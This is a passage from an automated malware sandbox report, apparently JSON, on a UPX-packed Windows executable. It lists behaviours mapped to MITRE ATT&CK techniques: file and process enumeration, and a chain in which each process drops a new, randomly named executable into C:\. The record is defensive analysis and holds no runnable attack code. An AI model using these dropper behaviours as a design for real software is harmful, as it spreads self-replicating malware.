(UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter ptnfvbx.exe (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00005816)\n \"ptnfvbx.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005896)\n \"ptnfvbx.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005896)\n \"ptnfvbx.exe\" called \"FindNextFileW\" with parameter 72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe (UID: 00000000-00005896)\n \"ptnfvbx.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005896)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"ptnfvbx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"vplpt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xdpjtxl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nxpbdf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"800866.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"482606.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"drrxb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ldlfr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rfhxbp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fhftdj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"442602.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8460680.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nblht.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"vfpfhn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hbdtpx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"44244.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"60448.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dtvthvj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"tlxfnh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fnpdnrn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"840882.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8082460.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"042028.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"084242.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lxrvjtr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" has an entrypoint in section \"UPX1\"\n \"64446.exe\" has an entrypoint in section \"UPX1\"\n \"fjpblh.exe\" has an entrypoint in section \"UPX1\"\n \"06268.exe\" has an entrypoint in section \"UPX1\"\n \"rlxfxx.exe\" has an entrypoint in section \"UPX1\"\n \"rxvnflf.exe\" has an entrypoint in section \"UPX1\"\n \"80060.exe\" has an entrypoint in section \"UPX1\"\n \"66686.exe\" has an entrypoint in section \"UPX1\"\n \"624000.exe\" has an entrypoint in section \"UPX1\"\n \"6206480.exe\" has an entrypoint in section \"UPX1\"\n \"rdnjbjh.exe\" has an entrypoint in section \"UPX1\"\n \"2408206.exe\" has an entrypoint in section \"UPX1\"\n \"2204200.exe\" has an entrypoint in section \"UPX1\"\n \"28042.exe\" has an entrypoint in section \"UPX1\"\n \"028260.exe\" has an entrypoint in section \"UPX1\"\n \"tfdbnrd.exe\" has an entrypoint in section \"UPX1\"\n \"rjrvvt.exe\" has an entrypoint in section \"UPX1\"\n \"blnxt.exe\" has an entrypoint in section \"UPX1\"\n \"tnvhlh.exe\" has an entrypoint in section \"UPX1\"\n \"ljhdxt.exe\" has an entrypoint in section \"UPX1\"\n \"82426.exe\" has an entrypoint in section \"UPX1\"\n \"28646.exe\" has an entrypoint in section \"UPX1\"\n \"228864.exe\" has an entrypoint in section \"UPX1\"\n \"8402266.exe\" has an entrypoint in section \"UPX1\"\n \"088422.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" wrote 13097 bytes starting with PE header signature to file \"C:\\ptnfvbx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ptnfvbx.exe\" wrote 13111 bytes starting with PE header signature to file \"C:\\lbxbhh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lbxbhh.exe\" wrote 13126 bytes starting with PE header signature to file \"C:\\vplpt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vplpt.exe\" wrote 13143 bytes starting with PE header signature to file \"C:\\xdpjtxl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xdpjtxl.exe\" wrote 13155 bytes starting with PE header signature to file \"C:\\nxpbdf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nxpbdf.exe\" wrote 13172 bytes starting with PE header signature to file \"C:\\8080888.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8080888.exe\" wrote 13192 bytes starting with PE header signature to file \"C:\\800866.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"800866.exe\" wrote 13211 bytes starting with PE header signature to file \"C:\\4400860.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4400860.exe\" wrote 13223 bytes starting with PE header signature to file \"C:\\8442880.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8442880.exe\" wrote 13239 bytes starting with PE header signature to file \"C:\\482606.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"482606.exe\" wrote 13250 bytes starting with PE header signature to file \"C:\\drrxb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"drrxb.exe\" wrote 13266 bytes starting with PE header signature to file \"C:\\ldlfr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ldlfr.exe\" wrote 13282 bytes starting with PE header signature to file \"C:\\00226.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"00226.exe\" wrote 13298 bytes starting with PE header signature to file \"C:\\28886.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"28886.exe\" wrote 13311 bytes starting with PE header signature to file \"C:\\4042240.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4042240.exe\" wrote 13323 bytes starting with PE header signature to file \"C:\\42068.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"42068.exe\" wrote 13336 bytes starting with PE header signature to file \"C:\\6028624.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6028624.exe\" wrote 13351 bytes starting with PE header signature to file \"C:\\rbtft.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rbtft.exe\" wrote 13366 bytes starting with PE header signature to file \"C:\\rfhxbp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rfhxbp.exe\" wrote 13384 bytes starting with PE header signature to file \"C:\\fhftdj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fhftdj.exe\" wrote 13396 bytes starting with PE header signature to file \"C:\\2886400.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2886400.exe\" wrote 13411 bytes starting with PE header signature to file \"C:\\442602.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"442602.exe\" wrote 13429 bytes starting with PE header signature to file \"C:\\8460680.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8460680.exe\" wrote 13441 bytes starting with PE header signature to file \"C:\\xbbfdpr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xbbfdpr.exe\" wrote 13452 bytes starting with PE header signature to file \"C:\\nblht.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nblht.exe\" wrote 13471 bytes starting with PE header signature to file \"C:\\hhrpl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hhrpl.exe\" wrote 13481 bytes starting with PE header signature to file \"C:\\vfpfhn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vfpfhn.exe\" wrote 13491 bytes starting with PE header signature to file \"C:\\hrrxd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hrrxd.exe\" wrote 13502 bytes starting with PE header signature to file \"C:\\hbdtpx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hbdtpx.exe\" wrote 13514 bytes starting with PE header signature to file \"C:\\2628842.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2628842.exe\" wrote 13526 bytes starting with PE header signature to file \"C:\\44244.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"44244.exe\" wrote 13540 bytes starting with PE header signature to file \"C:\\60448.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"60448.exe\" wrote 13556 bytes starting with PE header signature to file \"C:\\24006.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"24006.exe\" wrote 13575 bytes starting with PE header signature to file \"C:\\dtvthvj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dtvthvj.exe\" wrote 13592 bytes starting with PE header signature to file \"C:\\pthvxnr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pthvxnr.exe\" wrote 13606 bytes starting with PE header signature to file \"C:\\tlxfnh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tlxfnh.exe\" wrote 13617 bytes starting with PE header signature to file \"C:\\fnpdnrn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fnpdnrn.exe\" wrote 13631 bytes starting with PE header signature to file \"C:\\fpdjbdp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fpdjbdp.exe\" wrote 13641 bytes starting with PE header signature to file \"C:\\840882.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"840882.exe\" wrote 13654 bytes starting with PE header signature to file \"C:\\80428.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"80428.exe\" wrote 13674 bytes starting with PE header signature to file \"C:\\8082460.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8082460.exe\" wrote 13685 bytes starting with PE header signature to file \"C:\\8844842.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8844842.exe\" wrote 13704 bytes starting with PE header signature to file \"C:\\8482804.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8482804.exe\" wrote 13714 bytes starting with PE header signature to file \"C:\\60808.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"60808.exe\" wrote 13724 bytes starting with PE header signature to file \"C:\\042028.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"042028.exe\" wrote 13743 bytes starting with PE header signature to file \"C:\\22866.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"22866.exe\" wrote 13763 bytes starting with PE header signature to file \"C:\\084242.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"084242.exe\" wrote 13773 bytes starting with PE header signature to file \"C:\\2028620.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2028620.exe\" wrote 13792 bytes starting with PE header signature to file \"C:\\lxrvjtr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lxrvjtr.exe\" wrote 13808 bytes starting with PE header signature to file \"C:\\dpbtn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dpbtn.exe\" wrote 13825 bytes starting with PE header signature to file \"C:\\pxnlrd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pxnlrd.exe\" wrote 13838 bytes starting with PE header signature to file \"C:\\dvrdv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dvrdv.exe\" wrote 13856 bytes starting with PE header signature to file \"C:\\fnxtfnf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fnxtfnf.exe\" wrote 13870 bytes starting with PE header signature to file \"C:\\flxrvf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"flxrvf.exe\" wrote 13886 bytes starting with PE header signature to file \"C:\\406266.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"406266.exe\" wrote 13906 bytes starting with PE header signature to file \"C:\\464224.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"464224.exe\" wrote 13916 bytes starting with PE header signature to file \"C:\\088422.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"088422.exe\" wrote 13928 bytes starting with PE header signature to file \"C:\\8402266.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8402266.exe\" wrote 13946 bytes starting with PE header signature to file \"C:\\228864.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"228864.exe\" wrote 13966 bytes starting with PE header signature to file \"C:\\28646.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"28646.exe\" wrote 13983 bytes starting with PE header signature to file \"C:\\82426.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"82426.exe\" wrote 13994 bytes starting with PE header signature to file \"C:\\ljhdxt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ljhdxt.exe\" wrote 14004 bytes starting with PE header signature to file \"C:\\tnvhlh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tnvhlh.exe\" wrote 14017 bytes starting with PE header signature to file \"C:\\blnxt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"64446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"fjpblh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"06268.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rlxfxx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rxvnflf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"80060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"66686.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"624000.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"6206480.exe\" has type \"PE32 